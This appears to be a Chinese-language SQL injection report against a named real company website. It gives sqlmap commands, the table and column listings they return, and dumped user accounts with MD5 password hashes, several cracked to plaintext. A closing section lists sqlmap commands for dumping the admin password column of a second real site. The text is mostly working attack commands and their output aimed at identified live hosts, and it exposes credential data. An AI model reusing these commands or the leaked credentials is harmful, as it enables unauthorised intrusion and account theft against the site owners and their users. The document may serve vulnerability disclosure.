1.用友某处SQL
注入点:www.yonyou.com.hk/new/download_view.php?uid=4
2.数据库:db1007112_ufida中39个表
参数:–tables -D "db1007112_ufida"
Database: db1007112_ufida
[39 tables]
+————————-+
| admin_log |
| adpic |
| app_cat |
| app_company |
| app_file |
| app_fileImage |
| app_fileItem |
| app_log |
| app_login |
| app_partner |
| app_staff |
| banner |
| banner_2013 |
| banner_home_2013 |
| content_2013 |
| content_other_2013 |
| content_sub_2013 |
| down_file |
| downform |
| downform_2013 |
| download_2013 |
| downlog |
| downone |
| guestbook |
| info |
| menu |
| onepage |
| qikan |
| qksort |
| resources_download_2013 |
| resources_menu_2013 |
| sessions |
| sort |
| stats |
| support_2013 |
| tongji |
| userlog |
| users |
| video |
+————————-+
3.用户表中12个列,Table: users
参数:–columns -T "users" -D "db1007112_ufida"
[12 columns]
+————-+———————+
| Column | Type |
+————-+———————+
| action_list | text |
| create_time | datetime |
| creater | varchar(32) |
| email | varchar(60) |
| nav_list | text |
| password | varchar(32) |
| phone | varchar(11) |
| status | tinyint(1) unsigned |
| tel | varchar(11) |
| true_name | varchar(60) |
| users_id | tinyint(6) unsigned |
| users_name | varchar(60) |
+————-+———————+
4.列出用户和密码列中的数据。
参数:–dump -C "users_name,password" -T "users" -D "db1007112_ufida"
[17:55:26] [INFO] cracked password 'andy' for hash 'da41bceff97b1cf96078ffb249b3
d66e'
[17:55:28] [INFO] cracked password 'howard' for hash 'dc5ab2b32d9d78045215922409
541ed7'
[17:55:29] [INFO] current status: cuzki… /
[17:55:29] [INFO] cracked password 'jessica' for hash 'aae039d6aa239cfc121357a82
5210fa3'
[17:55:29] [INFO] cracked password 'johnny' for hash 'f4eb27cea7255cea4d1ffabf59
3372e8'
[17:55:29] [INFO] cracked password 'lawrence' for hash ' e02d90ea127f923d273786d0
55b6208e '
[17:55:29] [INFO] cracked password 'louis' for hash '777cadc280bb23ebea268ded983
38c39'
5.sqlmap跑出来密码;
Table: users
[10 entries]
+————+———————————————+
| users_name | password |
+————+———————————————+
| admin | 7bd90338e9640b6707ed8689a4bd929a |
| howard | dc5ab2b32d9d78045215922409541ed7 (howard) |
| lawrence | e02d90ea127f923d273786d055b6208e (lawrence) |
| tianye | 4ebc55777a60faaaf170c00f16a4b64e |
| louis | 777cadc280bb23ebea268ded98338c39 (louis) |
| andy | da41bceff97b1cf96078ffb249b3d66e (andy) |
| jessica | aae039d6aa239cfc121357a825210fa3 (jessica) |
| johnny | f4eb27cea7255cea4d1ffabf593372e8 (johnny) |
| liudong | 505a17b64f7e6f72bbc494338a7a1764 |
| imadmin | cf0ff09ef02ae82a9e660e768de567e3 |
+————+———————————————+
==============================小插曲==========================
sqlmap注入access
1.sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 –tables //查看所有表
2.sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 –columns -T admin //注入admin表
3.sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 –dump -T admin -C password //注入admin表中password列中的数据
